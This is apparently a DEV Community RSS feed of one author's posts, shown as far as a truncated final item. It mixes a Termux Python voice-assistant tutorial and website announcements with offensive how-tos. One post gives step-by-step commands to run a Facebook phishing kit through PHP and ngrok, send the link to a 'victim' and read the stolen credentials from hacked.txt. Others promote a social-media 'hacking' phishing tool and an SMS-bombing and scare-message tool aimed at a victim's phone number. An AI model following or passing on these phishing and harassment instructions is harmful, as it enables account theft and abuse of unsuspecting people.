<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Harshit Singh</title>
    <description>The latest articles on DEV Community by Harshit Singh (@proharshit).</description>
    <link>https://dev.to/proharshit</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F689639%2Fa1712c50-de5b-4342-b4ab-af2dae778629.png</url>
      <title>DEV Community: Harshit Singh</title>
      <link>https://dev.to/proharshit</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/proharshit"/>
    <language>en</language>
    <item>
      <title>A Fully Functional and more than 50 times tested Voice Assistant using Python in Mobile! With Code</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 02 Sep 2022 13:28:13 +0000</pubDate>
      <link>https://dev.to/proharshit/a-fully-functional-and-more-than-50-times-tested-voice-assistant-using-python-in-mobile-with-code-4bi9</link>
      <guid>https://dev.to/proharshit/a-fully-functional-and-more-than-50-times-tested-voice-assistant-using-python-in-mobile-with-code-4bi9</guid>
      <description>&lt;p&gt;Hello Everyone&lt;br&gt;
Today's topic is very helpful for those looking desperately how to make a voice assistant using Python in their mobile phones right away. Also I will give you the data used in each step. &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Install Termux And Termux:API but not from Google Play Store&lt;/strong&gt; &lt;/p&gt;

&lt;p&gt;So this step is gonna be very simple if I give you the links, so here they are.&lt;/p&gt;

&lt;p&gt;Termux : &lt;a href="https://f-droid.org/repo/com.termux_118.apk"&gt;https://f-droid.org/repo/com.termux_118.apk&lt;/a&gt;&lt;br&gt;
Termux:API : &lt;a href="https://f-droid.org/repo/com.termux.api_51.apk"&gt;https://f-droid.org/repo/com.termux.api_51.apk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Run the followong command in Termux upon installation.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; upgrade
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg &lt;span class="nb"&gt;install &lt;/span&gt;python espeak termux-api
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Data usage: 150mb+ Approx(200mb maybe) &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2: Save file to termux&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Type the following command in Termux&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nano Speak.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And paste the following code,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;#Created by Its Arun Stark on YT
#Modified by ProHarshit
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;subprocess&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Speak&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;engine&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;'espeak'&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;engine&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;engine&lt;/span&gt;
        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;rate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;150&lt;/span&gt; &lt;span class="c1"&gt;#Speed
&lt;/span&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;gender&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"m"&lt;/span&gt;
        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;
        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;language&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"en-gb"&lt;/span&gt; &lt;span class="c1"&gt;#en-gb for UK, en-us for US, en-in for Indi
&lt;/span&gt;        &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pitch&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;250&lt;/span&gt; &lt;span class="c1"&gt;#Pitch
&lt;/span&gt;    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;say&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Popen&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;engine&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s"&gt;"-s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;rate&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="s"&gt;"-v"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="s"&gt;"+"&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;gender&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="s"&gt;"-p"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;pitch&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;]).&lt;/span&gt;&lt;span class="n"&gt;communicate&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;*&lt;em&gt;The settings here are customized for a fully robotic voice. You can change *&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Press Ctrl then C the X and then press enter.&lt;/p&gt;

&lt;p&gt;Data usage: Offline Step&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Main Code&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now let's move towards the main code. &lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;strong&gt;Import Modules&lt;/strong&gt;&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;subprocess&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;Speak&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Speak&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;datetime&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;os&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;&lt;em&gt;Define Speak Function&lt;/em&gt;&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;speak&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Speak&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;say&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;em&gt;Keep the files Speak.py and this main file in same directory.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;Define Speech Check Function&lt;/em&gt;&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;checkspeech&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Listening..."&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;subprocess&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;getoutput&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"termux-speech-to-text"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; 
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Recognizing..."&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; 
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"User said"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;&lt;em&gt;Define set of commands(inside checkspeech())&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Now let's move towards your code recognizing a few commands. &lt;br&gt;
Here is one example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s"&gt;"hello"&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;speak&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"hello"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="s"&gt;"name"&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;speak&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"my name is jarvis"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The output will come a voice saying hello and it's name respectively&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;Define loop outside checkspeech()&lt;/em&gt;&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;checkspeech&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Data usage: Offline step&lt;/p&gt;

&lt;p&gt;So thanks for visiting today's tutorial. Please tell if I missed something. &lt;br&gt;
Stay Tuned&lt;br&gt;
Built with &lt;a href="https://dev.to/proansh"&gt;Ansh Yadav(Pro-Ansh)&lt;/a&gt; &lt;/p&gt;

</description>
      <category>python</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>ai</category>
    </item>
    <item>
      <title>I made a Personal Voice Assistant but it...(worked/failed)</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Thu, 18 Aug 2022 08:37:38 +0000</pubDate>
      <link>https://dev.to/proharshit/i-made-a-personal-voice-assistant-but-itworkedfailed-go6</link>
      <guid>https://dev.to/proharshit/i-made-a-personal-voice-assistant-but-itworkedfailed-go6</guid>
      <description>&lt;p&gt;I searched a lot, spent 10 to 20 hours, and finally got to know this was use___&lt;/p&gt;

&lt;p&gt;Welcome everyone &lt;br&gt;
Today I will tell you the python libraries used for your voice assistant using python. Also, some important things to keep in mind will be told in the next tutorial.&lt;/p&gt;

&lt;p&gt;Used libraries are:&lt;br&gt;
pyttsx3&lt;br&gt;
speech_recognition&lt;br&gt;
os&lt;br&gt;
time&lt;br&gt;
wikipedia&lt;br&gt;
pyfiglet&lt;br&gt;
datetime&lt;br&gt;
webbrowser&lt;/p&gt;

&lt;p&gt;Also, we will try to make a code for a personal voice assistant in android and Java.&lt;/p&gt;

&lt;p&gt;Thanks, A Lot&lt;br&gt;
Stay Tuned&lt;/p&gt;

</description>
      <category>python</category>
      <category>beginners</category>
      <category>tutorial</category>
      <category>programming</category>
    </item>
    <item>
      <title>My Brother has just started learning WebDev few months ago</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Wed, 22 Dec 2021 05:45:54 +0000</pubDate>
      <link>https://dev.to/proharshit/my-brother-have-just-started-learning-webdev-few-months-ago-4mgg</link>
      <guid>https://dev.to/proharshit/my-brother-have-just-started-learning-webdev-few-months-ago-4mgg</guid>
      <description>&lt;p&gt;Hello Everyone&lt;br&gt;
Here is my brothers new website.&lt;/p&gt;

&lt;p&gt;URL - &lt;a href="https://ourcontent.ml"&gt;https://ourcontent.ml&lt;/a&gt;&lt;br&gt;
Github Repo - &lt;a href="https://github.com/ProHarshit/OurContent"&gt;https://github.com/ProHarshit/OurContent&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Pls tell how did you like it.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>webdev</category>
      <category>html</category>
      <category>css</category>
    </item>
    <item>
      <title>New Scaring And Bombing Tool - HalloBomber</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 29 Oct 2021 14:00:36 +0000</pubDate>
      <link>https://dev.to/proharshit/new-scaring-and-bombing-tool-hallobomber-29j2</link>
      <guid>https://dev.to/proharshit/new-scaring-and-bombing-tool-hallobomber-29j2</guid>
      <description>&lt;p&gt;Hello Everyone &lt;br&gt;
Today I will be going to tell you how you can send scary messages in Whatsapp and do sms bombing using termux.&lt;/p&gt;

&lt;p&gt;Firstly install Termux from Play Store&lt;/p&gt;

&lt;p&gt;Then upgrade packages&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then install Git Package&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg &lt;span class="nb"&gt;install &lt;/span&gt;git &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then clone this repo&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/ProHarshit/HalloBomber
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then navigate to it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;HalloBomber
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash hallobomber.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then enter victim's phone number.&lt;br&gt;
It will automatically load msgs you just need to press send.&lt;br&gt;
Also keep a large number in sms bombing minimum 50.&lt;br&gt;
Also I recommend you to use a scary profile pic.&lt;/p&gt;

&lt;p&gt;Thank you&lt;br&gt;
(Followers Goal 50)&lt;br&gt;
Pls tell how did you like it&lt;/p&gt;

</description>
      <category>halloween</category>
      <category>python</category>
      <category>bash</category>
      <category>hacking</category>
    </item>
    <item>
      <title>Here is my new portfolio website made of PlainCSS And Javascript</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 22 Oct 2021 03:38:10 +0000</pubDate>
      <link>https://dev.to/proharshit/here-is-my-new-portfolio-website-made-of-plaincss-and-javascript-4oo7</link>
      <guid>https://dev.to/proharshit/here-is-my-new-portfolio-website-made-of-plaincss-and-javascript-4oo7</guid>
      <description>&lt;p&gt;Hello Everyone &lt;br&gt;
Here is my new website made of PlainCSS And Javscript.&lt;br&gt;
Here is the link&lt;br&gt;
&lt;a href="https://proharshit.ml" rel="noopener noreferrer"&gt;https://proharshit.ml&lt;/a&gt;&lt;br&gt;
Here is the link of Github Repo&lt;br&gt;
&lt;a href="https://github.com/ProHarshit/ProHarshit" rel="noopener noreferrer"&gt;https://github.com/ProHarshit/ProHarshit&lt;/a&gt;&lt;br&gt;
Thank you &lt;br&gt;
Please tell how did you like it&lt;/p&gt;

</description>
      <category>elasticsearch</category>
    </item>
    <item>
      <title>Best Ecommerce Website Template With HTML, CSS without Bootstrap</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Wed, 20 Oct 2021 04:09:44 +0000</pubDate>
      <link>https://dev.to/proharshit/best-ecommerce-website-template-with-html-css-without-bootstrap-2lmi</link>
      <guid>https://dev.to/proharshit/best-ecommerce-website-template-with-html-css-without-bootstrap-2lmi</guid>
      <description>&lt;p&gt;Hello Everyone&lt;br&gt;
Today I have a very stylish, responsive and lightweight ecommerce website template.&lt;/p&gt;

&lt;p&gt;Here is the link&lt;br&gt;
&lt;a href="https://mrbookseller.ml"&gt;https://mrbookseller.ml&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here is the link of Github Repo&lt;br&gt;
&lt;a href="https://github.com/ProHarshit/Mr.Bookseller.git"&gt;https://github.com/ProHarshit/Mr.Bookseller.git&lt;/a&gt;&lt;br&gt;
Please tell how did you like it.&lt;br&gt;
Thank you&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>html</category>
      <category>css</category>
      <category>netlify</category>
    </item>
    <item>
      <title>How to Hack Any Social Media Account with ProPhishr-New Tool</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 08 Oct 2021 15:13:22 +0000</pubDate>
      <link>https://dev.to/proharshit/how-to-hack-any-social-media-account-with-prophishr-new-tool-2gfo</link>
      <guid>https://dev.to/proharshit/how-to-hack-any-social-media-account-with-prophishr-new-tool-2gfo</guid>
      <description>&lt;p&gt;Hello Everyone&lt;br&gt;
Today I am going to show you how you can hack any social media account in android with termux.&lt;/p&gt;

&lt;p&gt;&lt;iframe src="https://player.vimeo.com/video/626577014" width="710" height="399"&gt;
&lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;Firstly install termux from Play Store and run these commands.&lt;/p&gt;

&lt;p&gt;Then upgrade packages&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then install Git Package&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg &lt;span class="nb"&gt;install &lt;/span&gt;git &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then clone this repo&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/ProHarshit/ProPhishr
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then navigate to it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;ProPhishr
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then run it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash prophishr.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Rest commands in video&lt;/p&gt;

&lt;p&gt;Thank you&lt;br&gt;
(Followers Goal 50)&lt;br&gt;
Pls tell how did you like it&lt;/p&gt;

</description>
      <category>hacking</category>
      <category>phishing</category>
      <category>php</category>
      <category>html</category>
    </item>
    <item>
      <title>I have started Learning WebDev Few Months Ago, Here is my website</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 08 Oct 2021 05:51:39 +0000</pubDate>
      <link>https://dev.to/proharshit/i-have-started-learning-webdev-few-months-ago-here-is-my-website-ec4</link>
      <guid>https://dev.to/proharshit/i-have-started-learning-webdev-few-months-ago-here-is-my-website-ec4</guid>
      <description>&lt;p&gt;Hello Everyone&lt;br&gt;
Here is my new website&lt;/p&gt;

&lt;p&gt;Url - &lt;br&gt;
&lt;a href="https://ourcontent.ml"&gt;https://ourcontent.ml&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Github Repo -&lt;br&gt;
&lt;a href="https://github.com/ProHarshit/OurContent"&gt;https://github.com/ProHarshit/OurContent&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thank you W3C And W3 Schools&lt;br&gt;
Pls tell how did you like it&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>html</category>
      <category>css</category>
    </item>
    <item>
      <title>How to Hack Any Facebook Account Credentials in 2021</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 08 Oct 2021 04:59:37 +0000</pubDate>
      <link>https://dev.to/proharshit/how-to-hack-any-facebook-account-credentials-in-2021-46jn</link>
      <guid>https://dev.to/proharshit/how-to-hack-any-facebook-account-credentials-in-2021-46jn</guid>
      <description>&lt;p&gt;Hello Everyone &lt;br&gt;
Today I am going to show you how you can hack any Facebook Account Credentials in Termux (Android)&lt;br&gt;
So lets get started&lt;/p&gt;

&lt;p&gt;Firstly install termux from Playstore&lt;/p&gt;

&lt;p&gt;Then upgrade packages&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;apt update &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; apt upgrade &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then install Git&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg &lt;span class="nb"&gt;install &lt;/span&gt;git &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then clone this repo&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/ProHarshit/FacebookPhish
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then navigate to it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;FacebookPhish
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then install php&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pkg &lt;span class="nb"&gt;install &lt;/span&gt;php &lt;span class="nt"&gt;-y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then start PHP Server&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;php &lt;span class="nt"&gt;-S&lt;/span&gt; localhost:8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then open another session and run this command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;chmod &lt;/span&gt;777 FacebookPhish/ngrok
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then turn on hotspot and run ngrok&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./ngrok http 8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then copy the web forwarding url and give it to the victim.Ask him/her to login.&lt;/p&gt;

&lt;p&gt;Now open another session and run this command&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;FacebookPhish &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;cat &lt;/span&gt;hacked.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run this command again and again until you get credentials&lt;/p&gt;

&lt;p&gt;Thank you&lt;br&gt;
'Follower Goal 50'&lt;br&gt;
Pls tell how did you like it&lt;/p&gt;

</description>
      <category>php</category>
      <category>html</category>
      <category>hacking</category>
      <category>phishing</category>
    </item>
    <item>
      <title>Install Vscode In Android New Method 2021</title>
      <dc:creator>Harshit Singh</dc:creator>
      <pubDate>Fri, 08 Oct 2021 04:46:52 +0000</pubDate>
